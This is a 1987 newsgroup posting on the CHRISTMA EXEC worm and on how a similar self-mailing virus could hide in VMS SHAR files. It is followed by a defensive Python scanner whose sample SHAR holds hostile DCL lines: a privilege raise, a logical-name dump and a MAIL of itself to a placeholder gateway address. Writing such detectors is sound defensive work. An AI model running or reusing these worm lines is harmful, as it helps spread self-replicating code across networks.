PYM@QUCDNSUR.BITNET (Dr John Pym [Cardiothoracic Surgery]) (12/28/87)
Compliments of the Season to the net.

By now, many of you will have heard of the (infamous) CHRISTMA EXEC
"virus" which infected BITNET/EARN/NETNORTH and virtually paralyzed IBM's
internal network for a day or two. For those who haven't seen the
various postings on the BITNET LINKFAIL list, RISKS-FORUM Digest, etc., I
will summarize (no flames for the oversimplifications in the interest of
brevity, please). Originating as a "prank" on a German end-node on EARN,
this EXEC (i.e. similar to a .COM file - and written in REXX, a DCL-like
language) displayed, when executed on an IBM VM system, a primitive
christmas tree on the terminal and then mailed itself to everyone on that
poor user's NAMES file (i.e. personal mailing name list) before deleting
itself. Of course, some users had network distribution lists (e.g.
JNET-L, MEDINF-L, etc.) defined in their NAMES file . . . [I
personally received six copies of this EXEC from different sources - this
is probably not unusual.]

While this was a significant problem on BITNET/EARN/NETNORTH with a
fair number of VM/CMS nodes, the virus clearly could not infect VAXinated
nodes, of which there are a larger number. Also, many (usually
undergraduate) students on VM/CMS systems are denied network access, thus
limiting the rate of spread of the virus beyond an infected system.
However, once the virus entered VNET, IBM's internal network of VM/CMS
systems, things really took off (all VM/CMS systems; users with large
NAMES files; all with network access) and allegedly brought their
network to a standstill.

Initially, the problem required manual intervention by system
managers to purge CHRISTMA EXECs from users' readers - but this could
only give a temporary remission in the disease. Fortunately, a CHRISTMA
eradicator was written (by Eric Thomas, author of the LISTSERV software),
and also an ingenious virus was developed (by Hank ?, sorry, I've
forgotten) to follow and destroy the original CHRISTMA virus and then
self-destruct in mid-January. So now it's eradicated like smallpox:
hmmm . . . I expect that there may be another minor epidemic when some
users return from vacation.

So, what should we do? Laugh at IBM? Say "It can't happen to me."
Look at all those experienced, computer-wise IBMers who ran CHRISTMA
EXEC. Oh yes, there will be flames . . . platitudes about NEVER using
any software which you haven't written yourself - or is written by
someone you TRUST ABSOLUTELY :-) . . . flames about chain letters
and viruses on the network . . . their authors should be boiled in oil
/ set in RA81 air filter glue / sentenced to do 10 years of RSX SYSGENs /
locked in a room with only an IBM PC / (substitute your favourite
nightmare here). Let's just think a little before flaming.

Could a "harmless" CHRISTMA-like virus attack a VAX/VMS system? A
recent network posting (RISKS?, LINKFAIL?) mentioned the possibility of a
virus hidden in SHAR files which are _executed_ as .COM files to unpack
them. SHAR files are, after all, an excellent method for _reliable_
software distribution over gateways. (This is not meant to reflect
negatively on Michael Bednarek in any way - VMSHAR is a great
contribution and we all have used it or will use it.) But . . . nobody
unpacks one of these distributions with PRIVs turned on, do we? Could
such a virus, like CHRISTMA EXEC, replicate from a non-privileged account
(apart from doing a SET PROC/PRIV=ALL quietly in the middle of the file)?
Certainly, VMS Mail won't allow wildcard SEND (and JNET won't allow a
wildcard SEND/FILE), but, for example, a .COM file could do a SHOW
LOGICAL/OUTPUT=CRACKER.TMP, look for logicals with syntax "jnet%",
"BITNET%", "IN%", etc. and try mailing itself to these addresses. (No
flames about giving state secrets to the enemy, please. Blind Freddy
could have seen that one.)

We may not be able to read a SHAR file in its entirety (looking for
a virus in a few thousand blocks of code), but I for one am certainly
going to "quarantine" it as far as possible, SEARCHing it for more than a
few key words before unpacking it from a non-privileged (either default
or authorized) account. Further suggestions from the more devious minds
on the list would be welcome, please. Ignorance may be bliss, but it is
definitely NOT SAFE.

Most if not all of us have public domain software running on our
systems - or programs written by students and our colleagues
(trustworthy, of course :-} ). How many VAX/VMS systems do _not_ use at
least one piece of DECUS software? This PD software, even if not
essential, makes life easier and/or saves hours of work. Software
exchange isn't going to stop now, nor should it. We must be vigilant,
both for our own safety, and as a responsibility to colleagues on the
network. We must make all reasonable efforts to check before executing
software ourselves or posting it to the net - or making it available for
FTP or putting it on a BITNET LISTSERV. CHRISTMA EXEC comes but once a
year, but a virus can be forever.

Comments from the Info-VAX gurus would be appreciated. What are the
guidelines for "safe software exchange"? What are the best methods of
checking software for viral contamination, granted that we are going to
continue to exchange it?

John Pym
BITNET: PYM@QUCDNSUR (POSTMASTER@QUCDNSUR)
Telephone: (613)549-3898 - office, (613)548-4879 - home, (613)541-7792 - cellular
Real life: Dr. John Pym, Department of Surgery, Queen's University, Kingston, Ontario, CANADA K7L 2V6
Chairman, THISLUG (DECUS Thousand Islands LUG)
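An added example, not code from the posting or from VMSHAR, to illustrate the "quarantine and SEARCH before unpacking" step John Pym suggests above. A plain SEARCH for "SET PROC/PRIV" is easy to slip past: DCL verbs and qualifiers may be abbreviated (SHO LOG/OUT is SHOW LOGICAL/OUTPUT), a command may be continued across lines with a trailing hyphen, and anything between $DECK and $EOD is data to the unpacker but runs the moment you execute the file it wrote. The Python below (my own, not a VMS tool) reads a DCL command procedure, joins continuations, strips comments and labels, matches the commands discussed in the posting under DCL abbreviation rules, and reports whether each hit is executed by the unpacker or merely embedded. The sample distribution, the rule list and MIN_ABBREV are all constructed assumptions for the example.

```python
"""Pre-unpack scanner for a DCL command procedure such as a VMSHAR distribution.

Constructed example: the sample SHAR below is made up, RULES is this scanner's
own list, and MIN_ABBREV is an assumption about how far a DCL verb or qualifier
may be shortened (DCL itself accepts any unique prefix)."""
import re
from dataclasses import dataclass

MIN_ABBREV = 3  # lower it to catch SH LOG/OUT-style forms at the cost of false positives

# (verb, second word or None, qualifier or None, why a distribution should not do it)
RULES = [
    ("SET", "PROCESS", "PRIVILEGES", "raises process privileges (SET PROC/PRIV)"),
    ("SHOW", "LOGICAL", "OUTPUT", "dumps logical name tables to a file (gateway harvesting)"),
    ("MAIL", None, None, "invokes MAIL"),
    ("SEND", None, "FILE", "JNET SEND/FILE"),
]
GATEWAY = re.compile(r"\b(JNET|BITNET|IN)%")  # the gateway prefixes the posting names

SAMPLE_SHAR = r'''$! Constructed VMSHAR-style distribution for this example, not a real posting
$ SET NOVERIFY
$ WRITE SYS$OUTPUT "Unpacking TREE.COM ..."
$ CREATE TREE.COM
$ DECK
$ WRITE SYS$OUTPUT "      *"
$ SET PROC/PRIV=ALL
$ EOD
$ SET PROC -
     /PRIV=ALL   ! continued line: a one-line SEARCH for "SET PROC/PRIV" misses this
$ sho log/out=cracker.tmp
$ MAIL/SUBJECT="Merry Christmas" TREE.COM "IN%""everyone@somewhere"""
$ DELETE CRACKER.TMP;*
$ EXIT
'''


@dataclass
class Command:
    lineno: int
    text: str        # joined, comment-stripped command text
    executed: bool   # False inside $DECK ... $EOD: data the unpacker writes, not runs


@dataclass
class Finding:
    lineno: int
    text: str
    executed: bool
    reasons: list


def abbrev(token, full):
    """DCL-style match: TOKEN is a prefix of FULL of at least MIN_ABBREV chars (or all of FULL)."""
    token = token.upper()
    return len(token) >= min(MIN_ABBREV, len(full)) and full.startswith(token)


def strip_comment(line):
    """Remove a trailing ! comment, ignoring ! inside double-quoted strings."""
    out, in_quote = [], False
    for ch in line:
        if ch == '"':
            in_quote = not in_quote
        elif ch == "!" and not in_quote:
            break
        out.append(ch)
    return "".join(out).rstrip()


def dcl_commands(text):
    """Yield Command objects for '$' lines, continuations joined and labels removed."""
    lines = text.splitlines()
    i, in_deck = 0, False
    while i < len(lines):
        raw, start = lines[i], i + 1
        i += 1
        if not raw.lstrip().startswith("$"):
            continue  # data line, e.g. after COPY SYS$INPUT
        body = strip_comment(raw.lstrip()[1:]).strip()
        while body.endswith("-") and i < len(lines):  # trailing hyphen continues the command
            nxt = lines[i].lstrip()
            i += 1
            if nxt.startswith("$"):
                nxt = nxt[1:]
            body = body[:-1].rstrip() + " " + strip_comment(nxt).strip()
        body = re.sub(r"^\w+:\s*", "", body)  # drop a label such as LOOP:
        if not body:
            continue
        verb = body.split()[0].split("/")[0].upper()
        if abbrev(verb, "DECK"):
            in_deck = True
        elif abbrev(verb, "EOD"):
            in_deck = False
        else:
            yield Command(start, body, executed=not in_deck)


def scan(text):
    """Return a Finding for every command matching RULES or naming a mail gateway."""
    findings = []
    for cmd in dcl_commands(text):
        words = [w for w in (t.split("/")[0] for t in cmd.text.split()) if w]
        quals = re.findall(r"/([A-Za-z]+)", cmd.text)
        if not words:
            continue
        reasons = [why for verb, second, qual, why in RULES
                   if abbrev(words[0], verb)
                   and (second is None or (len(words) > 1 and abbrev(words[1], second)))
                   and (qual is None or any(abbrev(q, qual) for q in quals))]
        m = GATEWAY.search(cmd.text.upper())
        if m:
            reasons.append(f"references network mail gateway {m.group(0)}")
        if reasons:
            findings.append(Finding(cmd.lineno, cmd.text, cmd.executed, reasons))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_SHAR):
        print(f"line {f.lineno:3} [{'RUNS' if f.executed else 'DATA'}] {f.text}")
        for r in f.reasons:
            print(f"            - {r}")
```

On the sample it reports the embedded SET PROC/PRIV inside the deck as DATA (harmless to the unpacker, not to whoever later runs TREE.COM), and the continued SET PROC / PRIV, the abbreviated sho log/out and the MAIL to an IN% gateway as RUNS. It is a triage aid for manual review, not a verdict: DCL can be abbreviated below MIN_ABBREV, and a string assembled at run time with symbol substitution will not match any of these rules, which is exactly why the unpacking should still happen in a non-privileged account.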